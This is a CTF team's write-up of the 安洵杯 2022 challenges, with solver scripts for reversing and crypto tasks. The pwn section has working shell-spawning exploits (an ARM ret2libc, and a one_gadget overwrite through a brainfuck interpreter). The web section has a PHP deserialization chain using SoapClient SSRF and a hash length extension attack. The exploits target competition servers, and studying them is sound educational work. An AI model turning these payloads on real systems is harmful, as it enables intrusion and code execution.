安洵杯2022 Writeups - CNSS

发表于2022-11-27更新于2024-02-23

Re

REEE

没难度的花指令,patch一下就过了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
Text = [0 for i in range(24)]
Text[0] = ord('V')
Text[1] = ord('a')
Text[2] = ord('c')
Text[3] = 0xA4
Text[4] = 0x22
Text[5] = 0xA4
Text[6] = 0x50
Text[7] = 0x7D
Text[8] = 0xCD
Text[9] = 0x8D
Text[10] = 0x13
Text[11] = 0x3D
Text[12] = 0x4A
Text[13] = 0x4F
Text[14] = 0xD
Text[15] = 0x62
Text[16] = 0x88
Text[17] = 0xAB
Text[18] = 0xFC
Text[19] = 0xE9
Text[20] = 0xBB
Text[21] = 0x1E
Text[22] = 0xA0
Text[23] = 0x90
def Generatekey():
    Doge = [ord('D'), ord('0'), ord('g'), ord('3')]
    v16 = [0 for i in range(256)]
    key = [0 for i in range(256)]
    for v4 in range(256):
        v7 = v4 % 4
        key[v4] = v4
        v16[v4] = Doge[v7]
    v9 = 0
    for i in range(256):
        v10 = key[i]
        v9 = (key[i] + v16[i] + v9) % 256
        xxx = key[i]
        key[i] = key[v9]
        key[v9] = xxx
    return key

v6 = [68, 52, 90, 171, 193, 145, 254, 142, 218, 189, 46, 108, 188, 22, 110, 139, 92, 69, 238, 180, 169, 85, 219, 87, 179, 252, 125, 191, 23, 61, 246, 47, 234, 53, 141, 50, 3, 170, 183, 135, 243, 18, 114, 44, 148, 6, 118, 207, 103, 250, 227, 175, 239, 102, 220, 109, 184, 19, 98, 168, 182, 120, 235, 100, 119, 89, 210, 72, 134, 205, 122, 244, 123, 152, 121, 197, 105, 27, 77, 167, 99, 159, 242, 0, 147, 144, 196, 93, 64, 48, 14, 84, 177, 204, 221, 128, 96, 241, 186, 129, 10, 133, 157, 104, 8, 192, 5, 181, 214, 151, 236, 36, 60, 127, 111, 208, 136, 178, 215, 95, 161, 165, 247, 112, 80, 7, 131, 78, 12, 223, 200, 233, 86, 206, 28, 158, 66, 1, 113, 176, 248, 74, 146, 216, 42, 149, 154, 21, 232, 198, 163, 70, 71, 156, 174, 51, 39, 57, 17, 106, 224, 226, 43, 83, 249, 82, 185, 237, 76, 75, 160, 54, 40, 115, 55, 199, 9, 225, 166, 130, 41, 79, 15, 45, 62, 222, 194, 212, 228, 31, 4, 91, 30, 245, 195, 155, 116, 25, 173, 217, 67, 251, 255, 230, 101, 73, 211, 11, 97, 137, 202, 162, 59, 37, 126, 150, 65, 209, 132, 164, 20, 201, 13, 29, 107, 143, 58, 140, 26, 56, 88, 34, 35, 213, 24, 38, 81, 229, 153, 63, 231, 2, 187, 138, 190, 33, 253, 32, 117, 49, 172, 203, 94, 16, 124, 240]
v5 = [68, 52, 90, 171, 193, 145, 254, 142, 218, 189, 46, 108, 188, 22, 110, 139, 92, 69, 238, 180, 169, 85, 219, 87, 179, 252, 125, 191, 23, 61, 246, 47, 234, 53, 141, 50, 3, 170, 183, 135, 243, 18, 114, 44, 148, 6, 118, 207, 103, 250, 227, 175, 239, 102, 220, 109, 184, 19, 98, 168, 182, 120, 235, 100, 119, 89, 210, 72, 134, 205, 122, 244, 123, 152, 121, 197, 105, 27, 77, 167, 99, 159, 242, 0, 147, 144, 196, 93, 64, 48, 14, 84, 177, 204, 221, 128, 96, 241, 186, 129, 10, 133, 157, 104, 8, 192, 5, 181, 214, 151, 236, 36, 60, 127, 111, 208, 136, 178, 215, 95, 161, 165, 247, 112, 80, 7, 131, 78, 12, 223, 200, 233, 86, 206, 28, 158, 66, 1, 113, 176, 248, 74, 146, 216, 42, 149, 154, 21, 232, 198, 163, 70, 71, 156, 174, 51, 39, 57, 17, 106, 224, 226, 43, 83, 249, 82, 185, 237, 76, 75, 160, 54, 40, 115, 55, 199, 9, 225, 166, 130, 41, 79, 15, 45, 62, 222, 194, 212, 228, 31, 4, 91, 30, 245, 195, 155, 116, 25, 173, 217, 67, 251, 255, 230, 101, 73, 211, 11, 97, 137, 202, 162, 59, 37, 126, 150, 65, 209, 132, 164, 20, 201, 13, 29, 107, 143, 58, 140, 26, 56, 88, 34, 35, 213, 24, 38, 81, 229, 153, 63, 231, 2, 187, 138, 190, 33, 253, 32, 117, 49, 172, 203, 94, 16, 124, 240]
cip = Text
j = 0
v4 = 0
for ii in range(24):
    v4 = (v4 + 1) % 256
    j = (j + v6[v4]) % 256
    xxx = v6[v4]
    v6[v4] = v6[j]
    v6[j] = xxx
    cip[ii] ^= v6[(v6[v4]+v6[j])%256]

for i in range(24):
    print(chr(cip[i]), end="")

好像有反调,但是也不用调

Re1

看了半天才看出来是虚拟机(

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
this[3] = &byte_405018;
  for ( i = byte_405018; i != -12; i = *(_BYTE *)this[3] )
  {
    v3 = 0;
    v4 = this + 4;
    while ( i != *v4 )
    {
      ++v3;
      v4 += 8;
      if ( v3 >= 7 )
        goto LABEL_7;
    }
    ((void (__cdecl *)(_DWORD *))this[2 * v3 + 5])(this);
LABEL_7:
    ;
  }

相当于一个分发器,找到opcode对应的代码

虚拟机第一段大概结构

1
2
3
4
5
6
7
8
9
10
0xF1, 0xE1, 0x00, 0x00, 0x00, 0x00, 
0xF1, 0xE2, 0x30, 0x00, 0x00, 0x00, 
0xF2, 
0xF6, 
0xF1, 0xE4, 0x20, 0x00, 0x00, 0x00, 
mov r1, [buf+0]
mov r2, [buf+30h]
r1 ^= r2
r1 = (r1 << 2) | (r1 >> 6)
mov [buf+20h], r1

1
2
3
4
for i in range(12):
	x = buf[i] ^ buf[0x30+i]
	buf[0x20+i] = (x << 2) | (x >> 6)
res = buf[0x20:0x2B]

第二段重复结构

1
2
3
4
5
6
7
8
9
10
11
12
0xF1, 0xE1, 0x20, 0x00, 0x00, 0x00, 
0xF1, 0xE2, 0x21, 0x00, 0x00, 0x00, 
0xF8, 0xE2, 0xA4, 
0xF2, 
0xF9, 0xE1, 0x05, 
0xF1, 0xE4, 0x40, 0x00, 0x00, 0x00,
mov r1, [buf+20h]
mov r2, [buf+21h]
add r2, A4h
xor r1, r2
sub r1, 05h
mov [buf+40h], r1

直接写exp解就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
xorkey = "abcdefghijkl"
cip    = [0xA7, 0x3A, 0x19, 0xB4, 0xF1, 0x49, 0x2B, 0xCB, 0xEA, 0x0E, 0x0E, 0x14]
addkey = [0xA4, 0x70, 0x4F, 0xD3, 0x5F, 0x03, 0x08, 0x28, 0x7F, 0x29, 0x37, 0xBA]
subkey = [0x05, 0x97, 0x79, 0x47, 0x92, 0x4A, 0xBD, 0x39, 0x29, 0x3B, 0xC1, 0xD1]
'''
for i in range(12):
		a = res[i]
		b = res[(i+1)%12]
		b += key1[i]
		a ^= b
		a -= key2[i]
		res[i] = a
'''
i = 11
while i != 0:
	a = cip[i]
	b = cip[(i+1)%12] + addkey[i]
	a += subkey[i]
	a ^= b
	cip[i] = a & 0xFF
	i -= 1

for i in range(12):
	cip[i] = ((cip[i] >> 2) | (cip[i] << 6)) & 0xFF
	cip[i] ^= ord(xorkey[i])
	print(chr(cip[i]), end="")

exp有一点小写挂,但是第一个字母很好猜,懒得调了。

flower.pyc

pycdas反汇编成字节码,太长不放了

直接看字节码就可以了

My_base64_encode函数返回的是tmp2,也就是使用Base64Table而不是Base46Table

1
2
3
4
5
6
7
8
626     LOAD_GLOBAL             6: ord
628     LOAD_GLOBAL             18: Base64Table
630     LOAD_FAST               3: i
632     LOAD_CONST              22: 22
634     BINARY_XOR              
636     BINARY_SUBSCR           
638     CALL_FUNCTION           1
640     STORE_FAST              15: tmp2

这一段其实是把原来的base64[i]改成base64[i^22]而已,没啥难度

后面分析一下jump可以知道充当密文的是KeyInputCmp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
258     LOAD_NAME               16: ret
260     LOAD_NAME               18: i
262     LOAD_NAME               18: i
264     LOAD_CONST              40: 4
266     BINARY_ADD              
268     BUILD_SLICE             2
270     BINARY_SUBSCR           
272     LOAD_NAME               19: Key1
274     LOAD_NAME               17: j
276     STORE_SUBSCR            
278     LOAD_NAME               17: j
280     LOAD_CONST              41: 1
282     BINARY_ADD              
284     STORE_NAME              17: j
286     LOAD_NAME               18: i
288     LOAD_CONST              40: 4
290     BINARY_ADD              
292     STORE_NAME              18: i
294     LOAD_NAME               17: j
296     LOAD_CONST              42: 10
298     COMPARE_OP              2 (==)
300     POP_JUMP_IF_FALSE       258
304     JUMP_ABSOLUTE           312
308     JUMP_ABSOLUTE           258

人脑反编译一下这段,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
input_srt = input()
ret = My_base64_encode(input_str)
j = 0
i = 0
Key1 = "1234512345"
len_ret = len(ret) // 4

while j != 10:
	Key1[j] = ret[i:i+4]
	j = j + 1
	i = i + 4

keyCheck = ''
if keyCheck[0] == keyinputcom[8]:
	//xxx

大概是这样,后面是重复的比较,但是是乱序的,基本都是这样的代码:

1
2
3
4
5
6
7
8
9
10
11
668     LOAD_NAME               19: Key1
670     LOAD_CONST              46: 8
672     BINARY_SUBSCR           
674     STORE_NAME              22: keyCheck
676     LOAD_NAME               6: str_hex
678     LOAD_NAME               22: keyCheck
680     CALL_FUNCTION           1
682     LOAD_NAME               3: KeyInputCmp
684     LOAD_CONST              50: 3
686     BINARY_SUBSCR           
688     COMPARE_OP              2 (==)

可以很轻松的找出对应关系:

1
2
3
4
5
6
7
8
9
10
0 == 8
1 == 9
2 == 1
3 == 7
4 == 5
5 == 0
6 == 6
7 == 4
8 == 3
9 == 2

写exp解一下就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
inputcmp = ['63356268', '75344678', '75386c6c', '2b69755a', '53546c57', '31396c34', '35547376', '36546c73', '3038736f','2b4f6167']
order = [8, 9, 1, 7, 5, 0, 6, 4, 3, 2]
xx = ""
for i in range(10):
	now = inputcmp[order[i]]
	xx += chr(int(now[0:2], 16))
	xx += chr(int(now[2:4], 16))
	xx += chr(int(now[4:6], 16))
	xx += chr(int(now[6:8], 16))
print(xx)
cip = xx
b64table = "i5jLW7S0GX6uf1cv3ny4q8es2Q+bdkYgKOIT/tAxUrFlVPzhmow9BHCMDpEaJRZNn1NSP78VQ5iZqVVRMA9ZZ2r77eeGLnwdj8"
b46table = "vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/n1NSP78VQ5iZqVVRMA9ZZ2r77eeGLnwdj8"
orib64table = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9', '+', '/']
res = ""
for i in range(len(cip)):
	for j in range(len(orib64table)):
		if cip[i] == b64table[j]:
			res += orib64table[j^22]
			break
print(res)

Crypto

Cry1

直接猜

Cry2

由于是ECB模式,直接每个字符枚举以下,判断多出来的那个块加密结果和中间是否一致,然后得到flag2,然后解密flag1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from Crypto.Util.number import *

	from pwnlib.util.iters import mbruteforce 
from hashlib import sha256 

from gmpy2 import *
from pwn import *
table = string.ascii_letters+string.digits
context.log_level = 'INFO'
def passpow():
    io.recvuntil(b"XXXX + ")
    suffix = io.recv(16).decode("utf8")
    io.recvuntil(b":")
    cipher = io.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
                        cipher, table, length=4, method='fixed')
    io.sendline(proof.encode()) 
io = remote("120.78.131.38",10086)
passpow()
io.interactive()
# for i in table:
#     for j in table:
#         for k in table:
#             io.recvuntil(b"You can input anything:")
#             payload = 'a'*8+'D0g3{'+i+j+k+'a'*8
#             io.send(payload)
#             io.recvuntil("Here is your cipher:")
#             ans = eval(io.recvline().strip())
#             #print(eval(ans))
#             if(ans[:32]==ans[32:64]):
#                 print(f"[+] the begin of flag find")
#                 break
#             else:
#                 continue
def pad(message):
	if(len(message)%16 !=0):
		return message.ljust((len(message)//16+1)*16,'0').encode
	else:
		return message.encode()
s = '}'
for count in range(16):
    for j in table:
        io.recvuntil(b"You can input anything:")
        payload = 'a'*8+j+s+'0'*16
        io.send(payload)
        io.recvuntil("Here is your cipher:")
        ans = eval(io.recvline().strip())
        #print(ans)
        #print(eval(ans))
        if(ans[32:64]==ans[96:]):
            print(f"find")
            s=j+s
            break
    print(s)

Cry3

重放一下,然后跟裴蜀定理差不多思路直接搞出m

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from Crypto.Util.number import *

from pwnlib.util.iters import mbruteforce 
from hashlib import sha256 

from gmpy2 import *
from pwn import *
# table = string.ascii_letters+string.digits
# #context.log_level = 'INFO'
# def passpow():
#     io.recvuntil(b"XXXX + ")
#     suffix = io.recv(16).decode("utf8")
#     io.recvuntil(b":")
#     cipher = io.recvline().strip().decode("utf8")
#     proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==
#                         cipher, table, length=4, method='fixed')
#     io.sendline(proof.encode()) 
# io = remote("120.78.131.38",10010)

# name1 = b'Whitfield__Diffi'
# name2 = b'e\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f'
# passpow()
# io.recvuntil("You must prove your identity to enter the palace ")
# C2 = int(io.recvline().strip(),16)
# name3 = long_to_bytes(C2^bytes_to_long(name1))
# io.send(name1+name2+name3+b'e')
# io.interactive()

(n, e1, e2, e3, c1, c2, c3) = (22308063714724452462594175772991482949404087975464067035286926170510749469125951641759623382890929400347746890505884025343468199849382152129033272670139207089014677113113424809369328057582620162865035543317066533190393744283598272438845018622940301755160967872602292917835296754028362203808307584958603387195521445377597539445755458119452713550910375839516122426821521274842873512978083170006162247527925037149151668443476001575317932297665482659481394810205993003893995684866908002062271941956877471366757465575174256530437864971949351751736657628134970316614793008232274949428845584851921309831050025268239920768589, 102704332752181173923908819345629527902559536200780272500702211857535517619064704374411352496824282428945235226706158016527940582310143442545788334065493882004470882657669068688548620446107390261774658636500170711922369121039264037791095962879707842376429141973467244013988871944421006633374000076432398620003, 165024902300996486453250888431039770568455943494755406694300391530994540175636663116553204440134778407337307301460534682861806187189412764722546099599285990828615604909111450378976251576050085610489178357078007828219728557992383528971392957583260743553237449781953940645938194303496517166079233440666514142521, 107929560700309464157348651169173146220713772911796919305761307127461813369090151746375666969221990592569250063102706312476803094329768752681754067815879864302941541362558648688816497421814512346852785167870392158541036594552798889655777378465522515892890374899516745808520849406338663060136664638205556905043, 8976406727259724401299593595974980423707886782418395663751444023362258263733237825549335125593984970498964093926006506809407513739183877755080526746531784959508737528600673070549242752177151129934047736890218618269644537828781231102744490749358089179171258321041577394587256373836785948820649808906200846088007957638183529565834875238204811163959551661247023747453209053532225832697125512950472772012185437462739088177332539644160978507985506812909546081830927038827528741774562515041663527602352404037444608291874464488338563500547497203145793336577512312851057567039426378864709438811757836733947860437752813073874, 7584524158725320074351784008519359374835951182992745058458048197251225256217803579600661491448464709943199922793159440956832342486020658392985408148122076326077812360990228994100769128474350056829654154788136760604131377845850956612933335186807666096081087705683527511023019284806846230411687893860322513658398698585532273414360069680401820566586007994163738298494558008326730136375705508372078954815745900383550589962367012092080704502635672544194563751350559218413839917658776581704952130399408036722236518241425397151292343989872422950843379617438893384112277887591993537242445573025423923301782066153841655087502, 12874907551207425853492066654210858231128780920602368657199977782691574832459718666244273465903557961294316057005108395257019922683946928508127643188812288873745597482079150648654475438398475817448433170854139857872300496456279812169769412244202082471971305133576730899060805915616216358001628177568898898527037406152306282427979677110245757943176624517838900030800465266313362806799265965766599961842838169077198908865450510259994567677548739991152611337656240833140093470022212202352612456680492844455065366040157461325780359734965239758270305599164579819847852805648715356918391619296289571364834908114405235733717)

(E1,a1,a2) = gcdext(e1,e2)
print((E1,a1,a2))
(one,A1,A2)=gcdext(E1,e3)
print((one,A1,A2))
a1 = a1*A1
a2 = a2*A1
a3 = A2
#print(a1*e1+a2*e2+a3*e3)
#print(a1,a2,a3)
print(long_to_bytes((pow(c2,a2,n)*invert(pow(c1,-a1,n)*pow(c3,-a3,n),n)%n)))

Pwn

babyarm

首先过变表base64,msg=b’s1mpl3Dec0d4r\n’

然后一个裸的栈溢出,ret2libc即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
msg = b's1mpl3Dec0d4r\n'
#io = process("qemu-arm -L /usr/arm-linux-gnueabi/ -g 1237 ./chall",shell = True)
io = remote("47.108.29.107",10260)
io.recvuntil("msg> ")
io.send(msg)

elf = ELF("./chall")
pop_r45678_sb_sl_pc = 0x00010cb0 
pop_r3_pc = 0x00010464
mov_r0_r7_blx_r3 = 0x00010ca0
libc = ELF("./libc-2.27.so")
#io.interactive()
main_addr = 0x00010C30
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(elf.plt['puts'])+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(elf.got['puts'])+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10
io.recvuntil("comment> ")
io.send(payload)
puts_got = u32(io.recv(4))
print(f"[+] puts_got = {hex(puts_got)}")
libc_base = puts_got-libc.sym['puts']
print(f"[+] libc_base = {hex(libc_base)}")
sys_addr = libc_base+libc.sym['system']
binsh_addr = libc_base+next(libc.search(b"/bin/sh"))
print(f"[+] sys_addr = {hex(sys_addr)}")
print(f"[+] binsh_addr = {hex(binsh_addr)}")
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(sys_addr)+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(binsh_addr)+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10

io.recvuntil("msg> ")
io.send(msg)
io.recvuntil("comment> ")
io.send(payload)
io.interactive()

easybf

对栈上的指针做操作,修改九号函数为one_gadget,最后执行jmp rax的时候跳转到one_gadget,不过要对函数表中的0号函数清零,使得[rsp+0x40] = NULL

,最后的时候也用不到这个函数进行指针偏移,所以没有影响

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pwn import *
#io = process("./chall")
io = remote("47.108.29.107",10260)
def debug(cmd=''):
    gdb.attach(io,cmd)
    pause()

"""
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
"""
0-> function 8
43-> function 2
44-> function 5
45-> function 3
46-> function 4
60-> function 0
62-> function 1
91-> function 6
93 ->function 7
"""
elf = ELF("./chall")
libc = ELF("./libc-2.27.so")

one = [0x4f2a5,0x4f302,0x10a2fc]


payload = '>'*32+'.>'*8
io.recvuntil("len>")
io.sendline(str(128))
io.recvuntil("code> ")
io.send(payload)

leak_addr = u64((io.recv()+io.recv(5)).ljust(8,b'\x00'))
libc_base = leak_addr -0x401b40
print(f'[+] libc_base = {hex(libc_base)}')

one_gadget = libc_base+one[1]
pop_rdi_ret = libc_base+0x000000000002164f
binsh_addr = libc_base+next(libc.search(b"/bin/sh"))
sys_addr = libc_base+libc.sym['system']
ret = libc_base+ 0xb1488
sub_rsp = libc_base+0x0000000000157e51
print(f'[+] sys_addr = {hex(sys_addr)}')
print(f'[+] binsh_addr = {hex(binsh_addr)}')
print(f'[+] one_gadget = {hex(one_gadget)}')
payload = '<'*8+',>'*8+'<'*10*8+',>'*8
io.recvuntil("len>")
io.sendline(str(512))
io.recvuntil("code> ")
io.sendline(payload)
#debug()

io.send(p64(one_gadget)+p64(0))

io.interactive()

Web

easy_php

pop链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$a = new A();
$a->a = "0e215962017";

$b = new B();

$c = new C();
$c->c =$a;

$b->a = $c;

$cc = new C();
$cc->a = "ssrf";
$a->b = $cc;

echo serialize($b);
exit;

查看 phpinfo发现session.serialize_handler=php,ini_set($_GET['baby'], $_GET['d0g3']);可以设置 php_serialize

利用session序列化不一致,根据flag.php, 构造$_SESSION[‘sess’] 对象,到 call_user_func(…) 执行,那么可以用 SoapClient 调用任意不存在的方法造成ssrf访问flag.php

首先根据提示,利用GlobIterator查找根目录文件

1
2
3
$a = new SoapClient(null, array('location' => 'http://127.0.0.1/flag.php?a=GlobIterator&b=/f*', 'uri' => 'http://127.0.0.1/'));
$b = serialize($a);
echo $b;

通过 var_dump($_SESSION); 拿到 sessionid 设置后再访问,拿到flag文件名 f1111llllllaagg

再利用SplFileObject读flag

1
2
3
$a = new SoapClient(null, array('location' => 'http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111llllllaagg', 'uri' => 'http://127.0.0.1/'));
$b = serialize($a);
echo $b;

EZ_JS

根据注释

1
2
3
4
<!--This secret is 7 characters long for security!
hash=md5(secret+"flag");// 1946714cfa9deb70cc40bab32872f98a
admin cookie is   md5(secret+urldecode("flag%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00dog"));
-->

爆破得到secret = abcdefg,admin cookie = ed63246fb602056fee4a7ec886d0a3c2,用admin尝试登录,/cookie jsfuck注解提示 admin大写,用Admin登录,改cookie里的hash为ed63246fb602056fee4a7ec886d0a3c2拿到flag